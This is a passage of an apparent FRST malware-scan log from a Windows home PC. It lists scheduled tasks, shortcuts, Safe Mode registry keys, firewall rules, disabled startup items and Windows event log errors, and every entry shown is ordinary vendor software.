Task: {191F9E6F-750B-463B-8275-674A085E6A42} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] ()
Task: {21D98608-212B-477C-9E51-862F8F865EFA} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe
Task: {22791815-78FB-4088-8BBB-3DA7D50664F8} - System32\Tasks\Antivirus Emergency Update => C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe [2017-10-20] (AVG Technologies CZ, s.r.o.)
Task: {2956E29D-A64D-413D-B892-F5AA2AC347BB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2A74738F-77EA-45BE-807D-0DA7AE3821FF} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-06] (Piriform Ltd)
Task: {377D44F2-DA65-41BB-88CF-6FFF1FAB3C41} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2017-09-05] (Oracle Corporation)
Task: {3999671B-80BF-4CDF-A95C-93FD2F0FE480} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {3B2D8390-8289-4929-BA17-F6A1C85B47FB} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {3CBC40D7-5079-4162-B3CF-8BB086B1F88F} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3E03F475-3149-4094-9896-BA78F8B2E6BC} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {40897B9F-93AB-425D-93AC-B8BA97E5EF17} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {42B3B434-E3AE-470E-99AF-7D12327B8919} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {43C39166-DBC4-4D93-BE8B-15FFD6AB03C8} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {46EB3B5F-0B59-4CAC-A06A-88742BCC1E3C} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation)
Task: {49072A42-1C33-4821-800D-28DD295D6786} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4D2B3324-B32F-4DB4-B0C1-1503C3219780} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [2017-03-28] ()
Task: {4FF356D2-FE47-4920-B00B-3E8B260DCA26} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {528B6446-B6F7-44E3-AA71-6203798B4E57} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {53C82D5D-CAA2-4928-AD01-FD5CA9402E42} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {54C24529-FE0D-45F3-921C-72B199731A29} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {595084B0-8061-4646-9643-A34F03C12F44} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {63882D74-4B0D-4654-86EE-D96AE3948093} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6563DB5C-54FD-4007-98A3-1F779956369C} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {6A73D90C-B17C-4761-8357-1A346F1A3327} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {6E4E297E-904A-4E8C-A1D8-E7015D9472FF} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation)
Task: {6FE732AA-0ED1-40DA-92A4-F64A10E68D10} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] ()
Task: {74B79B52-5FD9-4C14-BAB0-205B4C4DD9F9} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {818B6E4F-B131-4DE5-AA3E-03329037D6B4} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation)
Task: {82B3BF49-D8E5-44A0-99BB-744A644CF9B3} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2017-07-26] (AVG Technologies CZ, s.r.o.)
Task: {92BE7943-78D8-4C4B-883D-3B2AAF434323} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {A07E9AD8-DFAC-47D9-AB07-04E3E9CA4C84} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation)
Task: {A1231E6E-3113-41DF-B107-2905830BF645} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-10-11] (Microsoft Corporation)
Task: {A1D60D55-A6B8-401B-BC05-2938E02DF2F2} - System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan => d:\program files\windows defender\MpCmdRun.exe
Task: {A32272C9-4C2E-40B3-9BC4-7837AAA94F46} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe
Task: {B1450FE1-82E8-40F1-8F3F-5749E0F9E20E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {B339B57F-52A4-44A2-B3C0-AFE7668D7751} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
Task: {B75CC161-8539-4321-B7B7-BDBBDC184FCC} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-05-29] ()
Task: {BA7F3875-7416-4EF5-B045-A03824D3AFA2} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C11D840D-C170-4F9B-8C68-0CFA8D3BFBF9} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-10-25] (Adobe Systems Incorporated)
Task: {C1913C94-0842-490C-B755-F95332E09ABA} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {C4E8B14A-4159-4C58-BDAD-281DBBFC97E8} - System32\Tasks\Microsoft\Windows Defender\MpIdleTask => d:\program files\windows defender\MpCmdRun.exe
Task: {CE4EEC05-AE50-4266-B124-7496745958B2} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {D163B177-E9E5-43D7-B1DE-32EEFF81AA9A} - System32\Tasks\Dell SupportAssistAgent AutoUpdate => C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssist.exe [2016-04-22] (Dell Inc.)
Task: {DA5EBFDD-F0C4-44BB-802B-EC827B4A9BF5} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DA9D1E83-01AA-4187-BDB9-6D13247DE477} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DD892FCB-068E-4A07-AFA4-C8584CF611D9} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {FFD0BCF8-7926-4344-A2B0-908C275D350D} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Caret.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=fljalecfjciodhpcledpamjachpmelml
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Murder Files.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=ijfecbiladpinddbjfodaaiahggomhaf
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Pixlr Touch Up.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=jklljiahjgoglchglekebfljnmbaleig
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Solitaire.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=lkbhppfbabandkdmgjmifahoabeodiep
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sunrise Calendar.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=mojepfklcankkmikonjlnidiooanmpbb
ShortcutWithArgument: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\WorkFlowy.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=koegeopamaoljbmhnfjbclbocehhgmkm

==================== Loaded Modules (Whitelisted) ==============

2016-03-15 10:19 - 2017-11-10 06:37 - 008931496 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2017-03-18 15:58 - 2017-03-18 15:58 - 000138000 _____ () C:\WINDOWS\SYSTEM32\inputhost.dll
2017-03-18 15:59 - 2017-03-18 21:30 - 001731072 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BFE => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MpsSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SharedAccess => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppXSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\BITS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ClipSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "DisplayName"="Dell"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ErrorControl"="1"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ImagePath"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "ObjectName"="LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Start"="2"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+ => "Type"="272"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "Application"="C:\Program Files\Dell\Click 2 Fix+\srvc.exe"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dell Click 2 Fix+\Parameters => "AppParameters"=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\msiserver => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SamSs => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srv2 => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\srvnet => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TweakingRemoveSafeBoot => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vss => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WSService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="2"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\localhost -> localhost

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2015-08-13 13:46 - 000000734 ____N C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1       localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Charlie\Pictures\lighthouse.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: RapportMgmtService => 2
MSCONFIG\Services: RtkAudioService => 2
MSCONFIG\Services: SftService => 2
MSCONFIG\Services: TuneUp.UtilitiesSvc => 2
HKLM\...\StartupApproved\StartupFolder: => "Install LastPass FF RunOnce.lnk"
HKLM\...\StartupApproved\StartupFolder: => "Install LastPass IE RunOnce.lnk"
HKLM\...\StartupApproved\Run: => "SecurityHealth"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "CanonSolutionMenuEx"
HKLM\...\StartupApproved\Run32: => "DBAgent"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Adobe ARM"
HKLM\...\StartupApproved\Run32: => "USB3MON"
HKLM\...\StartupApproved\Run32: => "vProt"
HKLM\...\StartupApproved\Run32: => "Malwarebytes Anti-Exploit"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "OneNote 2010 Screen Clipper and Launcher.lnk"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "GarminExpressTrayApp"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "Uploader"
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{7CF0B69C-0DF4-4E8D-A6D0-6DF63D0B1078}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{9497CDF5-9603-4872-82A5-93316B585EE7}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D4EE236B-05CC-4705-ADEE-70E743A19AC5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{05FDCBFA-215A-4D4B-A73E-2AB2A29459BB}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{4D14B9BE-7542-4749-B117-E76E3718F94B}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{DD007F03-6CFB-4FF3-855D-77C1CAA586E4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{17259786-812F-437A-95AA-4348016A08BD}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{A6A28A3D-5FEE-4082-BB98-15AC1C5B7D7D}] => (Allow) C:\Program Files (x86)\Laplink\PCmover\pcmover.exe
FirewallRules: [{AC7706D0-A3B5-47C1-B042-A8187C6E147A}] => (Allow) LPort=8888
FirewallRules: [{863F6857-0276-49C5-B1E5-CFC6C75E1D42}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{E1E8C3C4-1603-491E-9EE6-5D72E01B5238}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{52D8F604-C3D5-47E7-B367-10F9C7371B49}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{D226D9A4-6BA1-44B6-A9D6-D4BDE65858D9}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1548C2C5-D5F3-42F1-9CD0-CCB29B1F8A25}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{A20652DE-EB50-4341-9C75-4F87A50AB71B}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{C27B36A2-3295-4928-B9AF-8A70F1B245E5}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{CB2E633C-B6CF-41FD-A0ED-2097BCC10CF8}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{97104FE1-B253-4B66-94B8-34C61639F706}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{4C7BD61A-FC97-4D74-BCE1-B3A03553E670}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{28D86D11-A19B-4C4C-8C72-E8D90A3AEF4F}C:\program files\mozilla firefox\firefox.exe] => (Block) C:\program files\mozilla firefox\firefox.exe

==================== Restore Points =========================

05-11-2017 16:29:34 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (11/13/2017 09:07:06 AM) (Source: COM) (EventID: 10031) (User: )
Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected

Error: (11/13/2017 06:28:15 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_lfsvc, version: 10.0.15063.0, time stamp: 0x02799ef5
Faulting module name: LocationFramework.dll, version: 10.0.15063.608, time stamp: 0xb3f3038c
Exception code: 0xe0464645
Fault offset: 0x00000000000aae2f
Faulting process id: 0x1968
Faulting application start time: 0x01d35c2a7b04d223
Faulting application path: c:\windows\system32\svchost.exe
Faulting module path: c:\windows\system32\LocationFramework.dll
Report Id: 0759c73d-d665-409c-8b6a-267a2a1e8b63
Faulting package full name:
Faulting package-relative application ID:

Error: (11/13/2017 06:27:56 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_lfsvc, version: 10.0.15063.0, time stamp: 0x02799ef5
Faulting module name: LocationFramework.dll, version: 10.0.15063.608, time stamp: 0xb3f3038c
Exception code: 0xe0464645
Fault offset: 0x00000000000b2c0b
Faulting process id: 0x1968
Faulting application start time: 0x01d35c2a7b04d223
Faulting application path: c:\windows\system32\svchost.exe
Faulting module path: c:\windows\system32\LocationFramework.dll
Report Id: 73f478de-eff5-4f4e-8e96-aba5e7f1089f
Faulting package full name:
Faulting package-relative application ID:

Error: (11/13/2017 06:25:03 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (11/13/2017 06:24:48 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: esu.exe, version: 1.0.0.0, time stamp: 0x58dac8d5
Faulting module name: KERNELBASE.dll, version: 10.0.15063.674, time stamp: 0x6d16dd24
Exception code: 0xe0434352
Fault offset: 0x000eb872
Faulting process id: 0x2188
Faulting application start time: 0x01d35c72029861ee
Faulting application path: C:\Program Files (x86)\Garmin\Express SelfUpdater\esu.exe
Faulting module path: C:\WINDOWS\System32\KERNELBASE.dll
Report Id: 96c0caee-0448-46ff-97eb-c8148453f7a2
Faulting package full name:
Faulting package-relative application ID:

Error: (11/13/2017 06:24:48 AM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: esu.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.IO.FileNotFoundException
   at Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61.MoveNext()
   at System.Runtime.CompilerServices.AsyncTaskMethodBuilder.Start[[Garmin.Omt.Service.Shared.Overrides+<UpdateDatacenterOverridesAsync>d__61, ExpressSelfUpdater, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null]](<UpdateDatacenterOverridesAsync>d__61 ByRef)
   at Garmin.Omt.Service.Shared.Overrides.UpdateDatacenterOverridesAsync(Boolean)
   at Garmin.Omt.Service.Shared.Overrides..cctor()

Exception Info: System.TypeInitializationException
   at Garmin.Omt.Service.Shared.Overrides.get_OmtBaseUrl()
   at Garmin.Omt.Express.SelfUpdater.Program.RealMain()
   at Garmin.Omt.Express.SelfUpdater.Program.Main(System.String[])

Error: (11/13/2017 06:23:04 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (11/13/2017 06:21:54 AM) (Source: COM) (EventID: 10031) (User: )
Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected

Error: (11/12/2017 11:23:06 PM) (Source: COM) (EventID: 10031) (User: )
Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected

Error: (11/12/2017 11:23:06 PM) (Source: COM) (EventID: 10031) (User: )
Description: An unmarshaling policy check was performed when unmarshaling a custom marshaled object and the class {41FD88F7-F295-4D39-91AC-A85F3149A05B} was rejected


System errors:
=============
Error: (11/13/2017 09:29:33 AM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: DCOM got error "1084" attempting to start the service EventSystem with arguments "Unavailable" in order to run the server:
{1BE1F766-5536-11D1-B726-00C04FB926AF}

Error: (11/13/2017 09:29:27 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/13/2017 09:28:49 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/13/2017 09:28:49 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/13/2017 09:28:47 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/13/2017 09:28:47 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/13/2017 09:28:47 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/13/2017 09:28:19 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/13/2017 09:28:19 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service WSearch with arguments "Unavailable" in order to run the server:
{B52D54BB-4818-4EB9-AA80-F9EACD371DF8}

Error: (11/13/2017 09:28:19 AM) (Source: DCOM) (EventID: 10005) (User: Charlie-PC)
Description: DCOM got error "1084" attempting to start the service ShellHWDetection with arguments "Unavailable" in order to run the server:
{DD522ACC-F821-461A-A407-50B198B896DC}


CodeIntegrity:
===================================
  Date: 2017-11-13 09:27:05.094
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-11-12 21:47:58.274
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-11-12 21:01:29.436
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-11-12 17:09:28.583
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

